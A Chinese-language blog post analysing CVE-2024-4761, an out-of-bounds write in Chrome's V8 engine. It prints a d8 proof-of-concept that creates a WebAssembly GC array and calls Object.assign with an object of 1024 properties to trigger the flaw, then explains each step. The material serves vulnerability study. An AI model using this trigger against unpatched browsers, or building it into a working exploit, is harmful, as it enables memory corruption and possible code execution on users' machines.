CVE-2024-4761 Chrome 的 JavaScript 引擎 V8 中的“越界写入”缺陷

已于 2024-05-14 18:02:56 修改
阅读量830 收藏 18
点赞数 7
分类专栏: 漏洞分析 文章标签: 网络安全 安全威胁分析
于 2024-05-14 18:00:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34594929/article/details/138864234
版权

分析 CVE-2024-4761 和 POC 代码

CVE-2024-4761 描述

CVE-2024-4761 是一个在 V8 引擎中发现的越界写漏洞,报告日期为 2024-05-09。这个漏洞可能允许攻击者通过特制的代码执行任意代码或者造成内存破坏,进而导致程序崩溃或其他不安全行为。

POC 代码解析
const prefix = "...";

d8.file.execute(`${prefix}/test/mjsunit/wasm/wasm-module-builder.js`);

let builder = new WasmModuleBuilder();

let array = builder.addArray(kWasmI32, true);

builder.addFunction('createArray', makeSig([kWasmI32], [kWasmExternRef]))
  .addBody([
    kExprLocalGet, 0,
    kGCPrefix, kExprArrayNewDefault, array,
    kGCPrefix, kExprExternConvertAny,
  ])
  .exportFunc();

let instance = builder.instantiate({});
let wasm = instance.exports;

let array42 = wasm.createArray(42);

let src = {};
src.a = 1;
delete src.a;

for (let i = 0; i < 1024; i++) {
  src[`p${i}`] = 1;
}

Object.assign(array42, src);

在这里插入图片描述

代码分析

  1. 加载 wasm-module-builder.js 模块

    d8.file.execute(`${prefix}/test/mjsunit/wasm/wasm-module-builder.js`);

    这里假设 D8(V8 引擎的调试工具)正在执行一段 JavaScript 代码,该代码加载了 WebAssembly 模块构建器脚本。

  2. 构建 WebAssembly 模块

    let builder = new WasmModuleBuilder();
let array = builder.addArray(kWasmI32, true);

    使用 WasmModuleBuilder 创建一个新的 WebAssembly 模块,并定义一个整数数组类型。

  3. 添加和导出一个函数

    builder.addFunction('createArray', makeSig([kWasmI32], [kWasmExternRef]))
  .addBody([
    kExprLocalGet, 0,
    kGCPrefix, kExprArrayNewDefault, array,
    kGCPrefix, kExprExternConvertAny,
  ])
  .exportFunc();

    这个函数 createArray 接受一个整数参数,创建一个新的 WebAssembly 数组并返回一个外部引用。函数体包含指令序列来获取局部变量,创建默认的数组,并将其转换为外部引用。

  4. 实例化模块并调用导出函数

    let instance = builder.instantiate({});
let wasm = instance.exports;
let array42 = wasm.createArray(42);

    实例化模块后,调用 createArray 函数,创建一个包含 42 个元素的数组。

  5. 构建和修改对象

    let src = {};
src.a = 1;
delete src.a;
for (let i = 0; i < 1024; i++) {
  src[`p${i}`] = 1;
}
Object.assign(array42, src);

    创建一个对象 src,并在其中动态添加属性。最后,使用 Object.assignsrc 的属性赋值给 array42

漏洞利用可能性

此代码通过 Object.assign 将一个具有大量属性的对象赋值给一个 WebAssembly 数组,这种操作在 V8 引擎内部可能导致内存管理或边界检查失效,进而触发越界写漏洞。具体表现可能包括覆盖数组边界以外的内存区域,从而执行任意代码或导致程序崩溃。

结论

从代码来看,这段 POC 似乎旨在触发 V8 引擎中的越界写漏洞。通过构建一个包含大量属性的对象并将其分配给 WebAssembly 数组,可以测试 V8 的内存边界检查是否有缺陷。如果存在缺陷,该操作可能会导致越界写,从而验证 CVE-2024-4761 漏洞的真实性。因此,POC 代码看起来是合理且可能真实的漏洞利用示例。

David_Jou
关注
  • 7
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
手把手教你详细分析 Chrome 1day 漏洞 (CVE-2021-21224)
smellycat000的专栏
04-23 2746
聚焦源代码安全,网罗国内外最新资讯!本文共分五部分:一、时间线二、背景三、漏洞及补丁分析1、漏洞复现四、漏洞利用分析1、漏洞利用2、内存读写3、代码执行五、参考资料一、时间线2021年4...
Google Chrome RCE漏洞 CVE-2020-6507 和 CVE-2024-0517 流程分析
黑剑
01-25 1856
Google Chrome 在关闭沙箱安全情况下,通过EXP进行远程代码执行
Chrome漏洞分析与利用(十二)——issue 1315901(CVE-2022-1364)
Anansi的博客
10-20 1091
本以为指向同一块element的FixedArray是在getThis生成的,但在getThis函数的执行逻辑并未找到,再结合patch与类似的漏洞cve 2021-21195的漏洞分析,最后发现FixedArray是在OptimizedFrame::Summarize函数生成的,该函数在创建JSError对象过程被调用会打包产生错误的函数及其相关对象数据。通过查看POC代码会发现e1,e2的C,M对象都是是通过C函数获取到的,C函数通过。
Chrome v8 pwn
sky123博客
04-17 2320
它是⼀个多进程+IPC的程序, 不同的进程管理不同的内容,
【高危】Google Chrome V8 < 120.0.6099.224 越界内存访问漏洞
murphysec的博客
01-17 879
Google Chrome V8 是一个由Google开发的开源JavaScript引擎,用于Google Chrome及Chromium。Google Chrome 120.0.6099.224版本之前,当通过runtime-object.cc的DeleteObjectPropertyFast删除对象属性时,可能未能正确处理内存或属性映射,导致越界内存访问漏洞。攻击者可以通过诱导用户访问恶意链接并利用此漏洞进行内存读取或写入,从而可能导致代码执行。漏洞已被Google发现在野利用。
ARM相关漏洞
qq_31932681的博客
11-18 1186
ARM相关漏洞 CVE Describe CVE-2020-25604 通过4.14.x在Xen发现了一个问题。在x86 HVM vCPU之间迁移计时器时,存在竞争条件。在x86 HVM guest虚拟机的vCPU之间迁移x86 HVM guest虚拟机的计时器时,使用的锁定模型允许同一guest虚拟机的第二个vCPU(也在计时器上运行)释放未获得的锁定。该问题最可能的影响是系统管理程序挂起或崩溃,即拒绝服务(DoS)。Xen的所有版本均受到影响。仅x86系统容易受到攻击。手臂系统并不脆弱
chrome沙盒_我对Chrome沙盒逃生漏洞利用链的看法
weixin_26707241的博客
09-11 649
chrome沙盒Google’s Project Zero published a blog post explaining an exploit chain that bypass the Chrome browser sandbox. In this post, I will try to discuss my take on trying to understand the exploit ...
tomcat 升级到8.5.99后,系统启动不起来问题(修复 CVE-2024-24549 拒绝访问漏洞)
04-16
在8.5.98基础上,增加了修复 CVE-2024-24549 漏洞代码
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在内存...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8241
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
强敌环伺:金融业信息安全威胁分析——整体态势
AKAMAI_CHINA的博客
01-29 1022
在Web应用程序和API攻击、零日漏洞以及DDoS攻击等方面,金融服务业一直是最主要的三大被攻击目标垂直行业之一。金融服务业的Web应用程序和API攻击数量同比激增3.5倍,在所有主要行业增速最快。如何阻止Web应用程序和API攻击利用新发现的零日漏洞针对金融服务业发起的攻击,在24小时内就可以轻松达到每小时数千次的规模,并且会快速达到峰值,这使得防御者几乎没时间打补丁或做出反应。
基于多种编程语言的卡拉音乐播放器设计源码
最新发布
05-28
本项目是基于多种编程语言的卡拉音乐播放器设计源码,包含625个文件,其包括389个JavaScript文件、70个TypeScript文件、52个PNG图像文件、22个JSON配置文件、19个Vue文件、12个MAP文件、11个WXSS样式文件、9个WXML模板文件、7个SVG文件和5个EOT字体文件。系统专注于提供卡拉音乐播放器功能,支持歌曲播放、播放列表管理等功能,为用户提供了一个稳定、高效的卡拉音乐播放器。
QTabWidget实现的炫酷标签工具栏+源码
05-28
qt 用法链接:https://menghui666.blog.csdn.net/article/details/139276655?spm=1001.2014.3001.5502 该项目基于QTabWidget和QTabBar实现了灵活的标签工具栏,主要包含如下功能: 1、标签栏可以收起,可以展开 2、可以在标签栏添加新的标签界面 3、可以从标签工具栏把界面拖出来,也可以拖回去 4、关闭拖出来的界面会自动回到标签工具栏 5、可以调换标签工具栏界面的顺序
VB学生公寓管理系统(源代码+论文).rar
05-28
计算机专业毕业设计VB精品论文资源
基于springboot的高校心理教育辅导管理系统
05-28
开发语言:Java JDK版本:JDK1.8(或11) 服务器:tomcat 数据库:mysql 5.6/5.7(或8.0) 数据库工具:Navicat 开发软件:idea 依赖管理包:Maven 代码+数据库保证完整可用,可提供远程调试并指导运行服务(额外付费)~ 如果对系统的的某些部分感到不合适可提供修改服务,比如题目、界面、功能等等... 声明: 1.项目已经调试过,完美运行 2.需要远程帮忙部署项目,需要额外付费 3.本项目有演示视频,如果需要观看,请联系我v:19306446185 4.调试过程可帮忙安装IDEA,eclipse,MySQL,JDK,Tomcat等软件 重点: 需要其他Java源码联系我,更多源码任你选,你想要的源码我都有! https://img-blog.csdnimg.cn/direct/e73dc0ac8d27434b86d886db5a438c71.jpeg
cve-2024-0195
01-19
cve-2024-0195是一个已被公开的漏洞编号,通常用于标识特定的计算机安全漏洞。这个漏洞编号通常由安全研究人员或组织在发现并报告一个新漏洞时,给漏洞分配一个唯一的标识符。 在这种情况下,cve-2024-0195表示在2024年发现的第195个已知漏洞。漏洞编号的目的是帮助用户和组织识别并补救安全漏洞,以保护其系统和数据免受潜在的攻击和损害。 对于普通用户来说,了解漏洞编号有助于他们更好地了解他们的系统或软件是否受到当前已知的漏洞威胁。对于技术人员和安全专家来说,漏洞编号可以帮助他们更有效地管理和防范潜在的安全风险。 总之,cve-2024-0195代表着一个已知的计算机安全漏洞,可能需要通过软件更新、修复补丁或其他安全措施来加以解决。因此,对于系统管理员和用户来说,了解并及时处理漏洞编号所代表的漏洞是非常重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

David_Jou

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值